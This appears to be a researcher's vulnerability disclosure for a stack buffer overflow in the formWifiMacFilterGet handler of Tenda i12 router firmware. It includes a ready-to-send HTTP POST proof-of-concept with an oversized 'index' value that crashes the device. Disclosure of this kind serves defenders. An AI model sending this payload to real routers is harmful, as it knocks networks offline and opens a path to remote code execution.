The formWifiMacFilterGet function in Tenda's i12 product has a buffer overflow

Information

Vendor: Tenda

Product: i12

Vulnerability: buffer overflow

Version: V1.0.0.6(2204)

Firmware Download: https://www.tenda.com.cn/material/show/2483

Descriptions

We found an overflow vulnerability in httpd :

In formWifiMacFilterGet function,it reads in a user-provided parameter wl_radio and index.

If the value of wl_radio is not 0, the variable Var will be passed to the sprintf function without any length check, which may overflow the stack-based buffer s__3.

As a result, by requesting the page, an attacker can easily execute a denial of service attack or remote code execution.

Proof of Concept (PoC)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POST /goform/WifiMacFilterGet HTTP/1.1
Host: 192.168.6.2
Content-Length: 2070
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://192.168.6.2
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.6.2/login.asp?0
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

wl_radio=1&index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Overcome


The formWifiMacFilterGet function in Tenda's i12 product has a buffer overflow
https://jimi-lab.github.io/2026/02/28/The-formWifiMacFilterGet-function-in-Tenda's-i12-product/
作者
Jimi
发布于
2026年2月28日
许可协议